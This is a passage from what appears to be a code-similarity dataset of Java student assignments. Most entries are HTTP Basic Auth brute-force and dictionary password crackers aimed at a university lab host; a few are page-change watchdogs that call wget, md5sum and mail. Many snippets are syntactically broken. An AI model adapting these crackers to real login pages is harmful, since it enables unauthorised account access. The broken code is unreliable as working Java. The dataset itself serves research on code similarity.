\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass Dictionary {\n\n private String password=\"\";\n\n private int num=401;\n\
\n\n public static void main(String[] args) {\n\n\n Dictionary URLcon;\n\
\n int length = 0;\n\n String passwd=\"\";\n\n int t0,t1;\n\n\
\ String line =\"\";\n \n if (args.length == 0) {\n \t\n \
\ System.err.println (\n \t\t\n \t\t\"Usage : java BruteForce <username>\"\
);\n return;\n \t\n }\n \n String username = args[0];\n\
\ \n \n t0=System.currentTimeMillis();\n \n System.out.println\
\ (\" \" + new Date());\n System.out.println (\"Using Dictionary method\
\ attack \"+username+\"'s password. Please waiting.......\");\n\n try{\
\ BufferedReader in = new BufferedReader(new FileReader(\"/usr/share/lib/dict/words\"\
));\n\n while ((passwd=in.readLine())!=null) {\n\n \t URLcon\
\ = new Dictionary (passwd,username);\n\n if ((URLcon.num)!=401) {\n\
\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n \
\ \tSystem.out.println(\"It took \"+DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds\");\n \n System.out.println (\"Finish\
\ \" + new Date());\n \n \treturn;\n\n \
\ }\n\n\n \t}\n\n }catch (FileNotFoundException e){\n \t\
System.out.println(e);\n }catch (IOException e){\n \tSystem.out.println(e);\n\
\ }\n\n\n System.out.println(\" not find the password\");\n\n\n}\n\n\
\ public Dictionary (String password,String username) {\n\n \t String urlString\
\ = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \n try {\n\n \
\ String userPassword = username+\":\"+password ;\n\n String encoding\
\ = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n\
\ URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "import java.util.*;\nimport java.io.*;\nimport java.*;\n\npublic class Dogs5\n\
{\n public static void main(String [] args) throws Exception\n { \n \
\ executes(\"rm index.*\");\n executes(\"wget http://www.cs.rmit.edu./students\"\
);\n\n while (true)\n {\n String addr= \"wget http://www.cs.rmit.edu./students\"\
;\n executes(addr);\n String hash1 = md5sum(\"index.html\");\n\
\ String hash2 = md5sum(\"index.html.1\");\n System.out.println(hash1\
\ +\"|\"+ hash2);\n \n BufferedReader buf = new BufferedReader(new FileReader(\"\
/home/k//Assign2/ulist1.txt\"));\n\n String line=\" \" ;\n String\
\ line1=\" \" ;\n String line2=\" \";\n String line3=\" \";\n\
\ String[] cad = new String[10];\n \n executes(\"./.sh\"\
);\n \n int i=0;\n while ((line = buf.readLine()) != null)\n\
\ {\n \n line1=\"http://www.cs.rmit.edu./students/images\"\
+line;\n if (i==1)\n line2=\"http://www.cs.rmit.edu./students/images\"\
+line;\n if (i==2)\n line3=\"http://www.cs.rmit.edu./students/images\"\
+line;\n i++;\n }\n System.out.println(line1+\" \"\
+line2+\" \"+line3); \n\n\n executes(\"wget \"+line1);\n executes(\"\
wget \"+line2);\n executes(\"wget \"+line3);\n \n String\
\ hash3 = md5sum(\"index.html.2\"); \n String hash4 = md5sum(\"index.html.3\"\
); \n String hash5 = md5sum(\"index.html.4\");\n\n \n\n\nBufferedReader\
\ buf2 = new BufferedReader(new FileReader(\"/home/k//Assign2/ulist1.txt\"));\n\
\n String linee=\" \" ;\n String linee1=\" \" ;\n String\
\ linee2=\" \";\n String linee3=\" \";\n\n executes(\"./ip1.sh\"\
);\n\n int j=0;\n while ((linee = buf2.readLine()) != null)\n\
\ {\n\n linee1=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n if (j==1)\n linee2=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n if (j==2)\n linee3=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n j++;\n }\n System.out.println(line1+\" \"\
+line2+\" \"+line3);\n\n\n executes(\"wget \"+linee1);\n executes(\"\
wget \"+linee2);\n executes(\"wget \"+linee3);\n\n String hash6\
\ = md5sum(\"index.html.5\");\n String hash7 = md5sum(\"index.html.6\"\
);\n String hash8 = md5sum(\"index.html.7\"); \n \n \
\ boolean pict=false;\n if (hash3.equals(hash6))\n pict=true;\n\
\n boolean pict2=false;\n if (hash3.equals(hash6))\n \
\ pict2=true;\n \n boolean pict3=false;\n if (hash3.equals(hash6))\n\
\ pict3=true;\n\n \n if (hash1.equals(hash2))\n \
\ { \n executes(\"./difference.sh\");\n executes(\"./mail.sh\"\
);\n \n \n\n }\n else\n {\n if (pict\
\ || pict2 || pict3)\n {\n executes(\".~/Assign2/difference.sh\"\
); \n executes(\".~/Assign2/mail2.sh\");\n \
\ }\n\n executes(\".~/Assign2/difference.sh\");\n executes(\"\
.~/Assign2/mail.sh\");\n \n \n \n executes(\"./reorder.sh\"\
);\n executes(\"rm index.html\");\n executes(\"cp index.html.1\
\ index.html\");\n executes(\"rm index.html.1\");\n executes(\"\
sleep 5\"); \n } \n }\n }\n\n public static void executes(String\
\ comm) throws Exception\n {\n Process p = Runtime.getRuntime().exec(new String[]{\"\
/usr/local//bash\",\"-c\", comm });\n\n BufferedReader bf = new BufferedReader(new\
\ InputStreamReader(p.getErrorStream()));\n\n String cad;\n while((\
\ cad = bf.readLine()) != null)\n {\n System.out.println();\n\
\ }\n\t p.waitFor();\n }\n\n public static String md5sum(String file)\
\ throws Exception\n {\n String cad;\n String hash= \" \"; \n\
\n Process p = Runtime.getRuntime().exec(new String[]{\"/usr/local//bash\"\
,\n \"-c\", \"md5sum \"+file });\n\
\ BufferedReader bf = new BufferedReader(new InputStreamReader(p.getInputStream()));\n\
\n while((bf = cad.readLine()) != null)\n {\n StringTokenizer\
\ word=new StringTokenizer();\n hash=word.nextToken();\n System.out.println(hash);\n\
\ }\n return hash; \n\n }\n\n \n \n}\n\n"
- "import java.io.*;\nimport java.*;\nimport java.net.*;\n\npublic class BruteForce\n\
{\n public static void main(String[] args) throws Exception\n {\n \n\
\ String password = checkPassword(); \n\n System.out.println(\"Congratulations\
\ Your password is \"+ password );\n \n \n\n URL url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n HttpURLConnection sec = (HttpURLConnection)url.openConnection();\n\
\ sec.setRequestProperty(\"Authorization\", \" \" + encode(\":\"+password));\n\
\ BufferedReader in = new BufferedReader(new InputStreamReader(sec.getInputStream()));\n\
\ String inputLine;\n\n while ((inputLine = in.readLine()) != null)\n\
\ System.out.println(inputLine);\n in.close();\n }\n\n \n\n \
\ private static String checkPassword() throws Exception\n {\n String\
\ Password=\" \";\n int attempt=0;\n URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\
);\n HttpURLConnection sec;\n String[] cad = {\"a\",\"b\",\"c\",\"d\"\
,\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n \
\ \"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\
z\",\n \"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"\
I\",\"J\",\"K\",\"L\",\"M\",\n \"N\",\"O\",\"P\",\"Q\",\"\
R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"};\n\n for (int i=0; i\
\ < cad.length; i++)\n {\n for (int j=0; j< cad.length;j++)\n \
\ {\n for (int k=0; k<cad.length;k++)\n {\n \
\ attempt++;\n String Passwd = new String(cad[i]+cad[j]+cad[k]);\n\
\ String userPasswd= \":\"+Passwd;\n System.out.println(attempt+\"\
\ \"+userPasswd);\n \n sec = (HttpURLConnection)url.openConnection();\n\
\ sec.setRequestProperty(\"Authorization\", \" \" + encode(userPasswd));\n\
\n if (sec.getHeaderField(0).equals(\"HTTP/1.1 200 OK\"))\n \
\ {\n Password=Passwd;\n return Password;\n\
\ }\n sec.disconnect();\n } \n \
\ } \n } \n return \"Password not found\";\n }\n\n private static\
\ String encode(String userPasswd) throws Exception\n {\n String ad;\n\
\ String encodedUserPasswd=\" \";\n String addr= \"~//base64_encode.php\
\ \"+userPasswd ;\n Process p = Runtime.getRuntime().exec(new String[]{\"\
/usr/local//bash\",\"-c\", addr});\n BufferedReader resp = new BufferedReader(new\
\ InputStreamReader(p.getInputStream()));\n \n while ( (cad = resp.readLine())\
\ != null )\n {\n \n encodedUserPasswd=cad;\n }\n \
\ return encodedUserPasswd;\n }\n}\n\n"
- source_sentence: "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime\
\ t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\
\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr =\
\ t.exec(\"md5sum csfirst.html\");\n\n InputStreamReader stre\
\ = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\
\t\t index = s.indexOf(' ');\n\t\t Fmd5 = s.substring(0,index);\n\t\t \
\ System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t \
\ pr = t.exec(\"wget http://www.cs.rmit.edu./students/\");\n\t\t pr = null;\n\
\t\t \n\t\t pr = t.exec(\"md5sum index.html\");\n\t\t \n\n\t\t InputStreamReader\
\ stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\
\t\t index = temp1.indexOf(' ');\n\t\t Smd5 = temp1.substring(0,index);\n\
\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5\
\ == Smd5)\n\t\t System.out.println(\" changes Detected\");\n\t\t else\n\
\t\t {\n\t\t pr = t.exec(\"diff csfirst.html index.html > report.html\"\
);\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\
\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(\" Message.txt\
\ | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.\");\n\t\t\
\ \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException\
\ e){}\n\t}\n}\t\t\n"
sentences:
- "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic\
\ class MyWatchDogTimer extends TimerTask\n{\n\tpublic void run()\n\t{\n\t Runtime\
\ rt = Runtime.getRuntime();\n\t Process prss= null;\n\t String initialmd5,presentmd5,finalmd5,temp1;\n\
\ String mesg1 = new String();\n String subject = new String(\"\
Report of WatchDog\");\n\n\t int i;\n \n\t try\n {\n\n \
\ prss = rt.exec(\"md5sum first.html\");\n\n InputStreamReader\
\ instre1 = new InputStreamReader(prss.getInputStream());\n BufferedReader\
\ bufread1 = new BufferedReader(instre1);\n\t\t \n sw = bufread1.readLine();\n\
\t i = finalmd5.indexOf(' ');\n\t initialmd5 = finalmd5.substring(0,i);\n\
\t System.out.println(\"this is of first.html--->\"+initialmd5);\n\t\t \
\ \n\n\t\t \n prss = rt.exec(\"wget -R mpg,mpeg, --output-document=present.html\
\ http://www.cs.rmit.edu./students/\");\n\n\t\t \n prss = rt.exec(\"\
md5sum present.html\");\n\t\t \n InputStreamReader instre2 = new\
\ InputStreamReader(prss.getInputStream());\n BufferedReader bufread2\
\ = new BufferedReader(instre2);\n\t\t \n\t temp1 = bufread2.readLine();\n\
\t i = temp1.indexOf(' ');\n\t presentmd5 = temp1.substring(0,i);\n\t\
\ System.out.println(\"this is of present.html---->\"+presentmd5);\n\t\t\n\
\ \n if(initialmd5.equals(presentmd5))\n \
\ System.out.println(\"The checksum found using md5sum is same\");\n\t\t else\n\
\t\t {\n\t\t prss = rt.exec(\"diff first.html present.html > diff.html\"\
);\n System.out.println(\" is different\"); \n \
\ prss = null;\n mesg1 =\"php mail.php\";\n\t\t \
\ prss = rt.exec(mesg1);\n\t\t } \n\n prss = rt.exec(\"\
rm present.*\");\n\n \t }catch(java.io.IOException e){}\n\n }\n\
}\t\t\n"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class Dictionary\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n Dictionary a = new Dictionary();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n File file = new File(\"words\");\n\
\ exit:\n try {\n\t\t BufferedReader in = new BufferedReader(new FileReader(file));\n\
\t\t int attempt = 0;\n\t\t inp[2] = in.readLine();\n\t\t while (inp[2] != null)\
\ {\n\t\n\t\t\t if (inp[2].length() <= 3) {\n\t\t\t \tattempt++;\n\t\t\t \ta.doit(inp);\n\
\ \t\t \tif (status) {\n\t\t\t \t\t System.out.println(\"Crrect password is:\
\ \" + inp[2]);\n\t\t\t \t\t System.out.println(\"Number of attempts = \" + attempt);\n\
\t\t\t \t\t break exit;\n\t\t\t \t}\n\t\t \t }\n\t\t\t inp[2] = in.readLine();\n\
\ \t\t}\n\t } catch (FileNotFoundException e1) {\n\t\t \n\t\tSystem.err.println(\"\
File not found: \" + file);\n\t} catch (IOException e2) {\n\t\t\n\t\te2.printStackTrace();\n\
\t}\n\n }\n\n public void doit(String args[]) {\n \n try {\n \
\ BufferedReader in = new BufferedReader(\n new InputStreamReader\n\
\ (connectURL(new URL(args[0]), args[1], args[2])));\n String\
\ line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n\
\ status = true;\n }\n }\n catch (IOException e)\
\ {\n \n }\n }\n\n public InputStream connectURL (URL url, String\
\ uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.net.*; \nimport java.io.*; \nimport java.util.Date; \npublic\
\ class Dictionary{\nprivate static String password=\" \"; \n\n \n public\
\ static void main(String[] args) {\n String Result=\"\"; \n\t if (args.length<1)\n\
\t {\n System.out.println(\"Correct Format Filename username e.g<>\");\
\ \n System.exit(1);\t\n\t }\n\t \n\t Dictionary dicton1 = new Dictionary();\n\
\ Result=dicton1.Dict(\"http://sec-crack.cs.rmit.edu./SEC/2/\",args[0]);\
\ \n\t System.out.println(\"Cracked Password for The User \"+args[0]+\" The Password\
\ is..\"+Result); \n \n\n \n \n }\n\n\n\n private String Dict(String urlString,String\
\ username) \n { \n int cnt=0;\n FileInputStream stream=null;\n DataInputStream\
\ word=null;\n\n\ttry{ \n\t stream = new FileInputStream (\"/usr/share/lib/dict/words\"\
); \n\n\tword =new DataInputStream(stream);\n\t t0 = System.currentTimeMillis();\
\ \n\t\t while (word.available() !=0) \n\t\t\t{\n\t\t\t\t\t\t\t\t\t\n\t\t\t\
password=word.readLine();\n\t\t\t\t if (password.length()!=3)\n\t\t\t\t {\n\t\t\
\t\t\tcontinue;\n\t\t\t\t }\n\t\t\t\t System.out.print(\"crackin...:\"); \n\t\t\
\t System.out.print(\"\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\" ); \n\t\t\t URL\
\ url = new URL (urlString);\n\t\t\t\tString userPassword=username+\":\"+password;\
\ \n\t\t\t\t \n\t\t\t\t String encoding = new url.misc.BASE64Encoder().encode\
\ (userPassword.getBytes());\n\t\t\t\t\t URLConnection conc = url.openConnection();\n\
\t\t\t\t\t\t conc.setRequestProperty (\"Authorization\", \" \" + encoding);\t\
\t\t \n\t\t\t\t\t\t conc.connect(); \n\t\t\t\t\t\t cnt++;\n\t\t\t\t\t \
\ if (conc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200 OK\"))\n\t\
\t\t\t\t\t {\n\t\t\t\t\t\t\tSystem.out.println(\"The Number Of Attempts : \"+cnt);\
\ \n\t\t\t\t\t\t\t t1 = System.currentTimeMillis(); \n\t\t\t\t\t\t\t net=t1-t0;\n\
\t\t\t\t\t\t\tSystem.out.println(\"Total Time in secs...\"+net/1000); \n\t\t\t\
\t\t\t\treturn password; \n\t\t\t\t\t\t}\n \t\t \t\t\n\t }\n\n\t\t\t\t\
}\n\n\t\t \tcatch (Exception e )\n\t\t\t\t{\n\t\t\t\t e.printStackTrace();\
\ \n\n\t\t\t\t}\n\n \ntry\n{\nword.close();\nstream.close(); \n\t\n}\n \n\
catch (IOException e)\n{ \nSystem.out.println(\"Error in closing input file:\\\
n\" + e.toString()); \n} \n\nreturn \"Password could not found\"; \n } \n \n\
\n}"
- source_sentence: "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\
\ extends Authenticator {\n\n \n private String username;\n \n private\
\ char [] thisPassword;\n \n private URL url;\n \n private BufferedReader\
\ bf;\n\n \n public static void main(String [] args) {\n if(args.length!=3)\
\ {\n System.err.println(\n \"usage: Dictionary\
\ <url> <username> <dictionary-file>\");\n System.exit(1);\n \
\ }\n Dictionary d = null;\n try {\n d = new Dictionary(args[0],\
\ args[1], args[2]);\n } catch (MalformedURLException me) {\n \
\ me.printStackTrace();\n System.exit(1);\n } catch (FileNotFoundException\
\ fe) {\n fe.printStackTrace();\n System.exit(1);\n \
\ }\n d.work();\n }\n\n \n public Dictionary(String url, String\
\ username, String passwordFilename) \n throws MalformedURLException,\
\ FileNotFoundException {\n this.url = new URL(url);\n this.username\
\ = username;\n thisPassword = new char [] {'a'};\n File f = new\
\ File(passwordFilename);\n FileReader fr = new FileReader(f);\n \
\ bf = new BufferedReader(fr);\n }\n\n \n public void work() {\n \
\ Authenticator.setDefault(this);\n HttpURLConnection uc = null;\n\
\ try { \n uc\
\ = (HttpURLConnection) url.openConnection(); \n uc.connect(); \
\ \n while(uc.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED\
\ &&\n thisPassword !=null) {\n try { \
\ \n InputStream is = uc.getInputStream();\
\ \n uc.connect(); \n \
\ } catch (ProtocolException pe) { \n \
\ uc = (HttpURLConnection) url.openConnection(); \n \
\ } catch (NullPointerException npe) { \n npe.printStackTrace();\
\ \n System.exit(1); \
\ \n } \n \
\ } \n } catch\
\ (java.io.IOException e ) { \n e.printStackTrace();\
\ \n System.exit(1); \
\ \n } \
\ \n System.out.println(\"password=\" + new String(thisPassword));\n\
\ }\n\n \n public PasswordAuthentication getPasswordAuthentication()\
\ {\n String s=null;\n try {\n for(s = bf.readLine();\
\ s!=null; s = bf.readLine()) {\n if(s.length()==3) {\n \
\ break;\n }\n } \n } catch (IOException\
\ e) {\n e.printStackTrace();\n System.exit(1);\n \
\ }\n if(s.length()!=3) {\n thisPassword = null;\n }\
\ else {\n thisPassword = s.toCharArray();\n }\n return\
\ new PasswordAuthentication(username, thisPassword);\n }\n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\
\ String strUserName;\n private String strURL;\n private String strDictPath;\n\
\ private int iAttempts;\n\n \n public Dictionary(String strURL,String\
\ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\
\ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\
\ }\n \n\n public String getPassword(){\n URL u;\n String result\
\ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\
\ uc;\n String strPassword = new String();\n String strEncode;\n \
\ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\
\ uc = u.openConnection();\n uc.setDoInput(true);\n \
\ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\
\ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\
\ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\
);\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\
\ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\
\ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\
\ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\
\ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\
\ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \
\ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\
\ String getNewPassword()\n throws PasswordFailureException{\n try {\n \
\ {\n line = inputFile.readLine();\n }while (line.length() !=\
\ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\
\ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\
\ RuntimeException {\n\n public PasswordFailureException() {\n }\n}"
- "import java.net.*;\nimport java.io.*;\n\n\npublic class BruteForce extends Authenticator\
\ {\n\n \n private String username;\n \n private URL url;\n \n\
\ private char [] nextPassword;\n \n private char [] thisPassword;\n\n\
\ \n public static void main(String [] args) {\n if(args.length!=2)\
\ {\n System.err.println(\"usage: BruteForce <url> <username>\");\n\
\ System.exit(1);\n }\n BruteForce bf = null;\n \
\ try {\n bf = new BruteForce(args[0], args[1]);\n } catch\
\ (MalformedURLException me) {\n me.printStackTrace();\n \
\ System.exit(1);\n }\n bf.work();\n System.exit(0);\n \
\ }\n\n \n public BruteForce(String url, String username) \n \
\ throws MalformedURLException {\n this.url = new URL(url);\n \
\ this.username = username;\n this.nextPassword = new char [] {'a'};\n\
\ }\n\n \n public void work() {\n Authenticator.setDefault(this);\n\
\ HttpURLConnection uc = null;\n try {\n uc = (HttpURLConnection)\
\ url.openConnection();\n uc.connect();\n\t while(uc.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED\n\
\ && nextPassword!=null) {\n try {\n \
\ InputStream is = uc.getInputStream();\n uc.connect();\n\
\ } catch (ProtocolException pe) {\n uc = (HttpURLConnection)\
\ url.openConnection();\n } catch (NullPointerException npe) {\n\
\ npe.printStackTrace();\n System.exit(1);\n\
\ } \n }\n } catch (java.io.IOException e) {\n\
\ e.printStackTrace();\n System.exit(1);\n }\n \
\ System.out.println(\"password=\" + new String(thisPassword));\n }\n\n\
\ \n public PasswordAuthentication getPasswordAuthentication() {\n \
\ createNextPassword();\n return new PasswordAuthentication(username,\
\ thisPassword);\n }\n\n \n public void createNextPassword() {\n \
\ int i;\n if(thisPassword==null) {\n thisPassword = new\
\ char [] {'A', 'A', 'A'};\n nextPassword = new char [] {'A', 'A',\
\ 'B'};\n return;\n }\n thisPassword = nextPassword;\n\
\ if(nextPassword[2]=='Z') {\n nextPassword[2]='a';\n \
\ return;\n } else if(nextPassword[2]!='z') {\n i = (int)\
\ nextPassword[2];\n nextPassword[2]=(char) ++i;\n } else {\n\
\ nextPassword[2]='A';\n if(nextPassword[1]=='Z') {\n \
\ nextPassword[1]='a';\n } else if(nextPassword[1]!='z')\
\ {\n i = (int) nextPassword[1];\n nextPassword[1]=(char)\
\ ++i;\n } else {\n nextPassword[1]='A';\n \
\ if(nextPassword[0]=='Z') {\n nextPassword[0]='a';\n\
\ } else if(nextPassword[0]!='z') {\n i = (int)\
\ nextPassword[0];\n nextPassword[0]=(char) ++i;\n \
\ } else {\n nextPassword = null;\n }\n\
\ }\n }\n }\n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\t\n\nclass MyAuthenticator extends\
\ Authenticator {\n\n String password;\n\n public MyAuthenticator(String pwdin)\
\ {\n password = pwdin;\n }\n \n protected PasswordAuthentication\
\ getPasswordAuthentication(){\n\tString pwd = password;\n\treturn new PasswordAuthentication(\"\
\",pwd.toCharArray());\n }\n}\n"
- source_sentence: "import java.net.*;\nimport java.util.*;\n\npublic class BruteForce\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer\
\ validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n\
\ while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n\
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n } catch (Exception e) {\n\
\ System.out.println(\" was exception: \" + e.getMessage());\n \
\ }\n int count = passPtr;\n while (true) {\n \
\ if (password[count] == validChars.charAt(validChars.length() - 1)) {\n \
\ password[count] = validChars.charAt(0);\n count--;\n\
\ } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count]))\
\ + 1);\n break;\n }\n if (count < 0) {\n\
\ \n if (passPtr < MAX_LENGTH - 1) {\n \
\ passPtr++;\n password[passPtr] = validChars.charAt(0);\n\
\ } else {\n morePasswords = false;\n \
\ }\n break;\n }\n }\n \n }\
\ \n if (!auth) {\n System.out.println(\"Unable determine password\"\
);\n } else {\n time = (new Date()).getTime() - start.getTime();\n\
\ System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds\
\ crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator\
\ {\n char[] password;\n public CrackAuth(char[] password) {\n this.password\
\ = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n\
\ {\n String user = \"\";\n return new PasswordAuthentication(user,\
\ password);\n }\n}\n"
sentences:
- "import java.io.*;\nimport java.util.*;\nimport java.net.*;\nimport java.net.Authenticator;\n\
\n\npublic class BruteForce\n{\n\n\tprivate String result =\"\";\n\n\tpublic\
\ class customAuthenticator extends Authenticator {\n\t public customAuthenticator(String\
\ passwd)\n {\n this.pass = passwd;\n }\n\n\t \
\ protected PasswordAuthentication getPasswordAuthentication()\n \
\ {\n\t return new PasswordAuthentication(\"\",pass.toCharArray());\n\
\ }\n public String pass;\n }\n\n public BruteForce()\
\ {\n java.util.Date d = java.util.Calendar.getInstance().getTime();\n\
\ System.out.println(d.toString());\n\t\tchar words[] = { 'a','b','c','d','e',\
\ 'f', 'g', 'h', 'i','j','k','l','m','n','o','p',\n\t\t\t\t\t\t\t 'q','r','s','t','u','v','w','x','y','z',\
\ 'A','B','C','D','E', 'F', 'G',\n\t\t\t\t\t\t\t 'H', 'I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
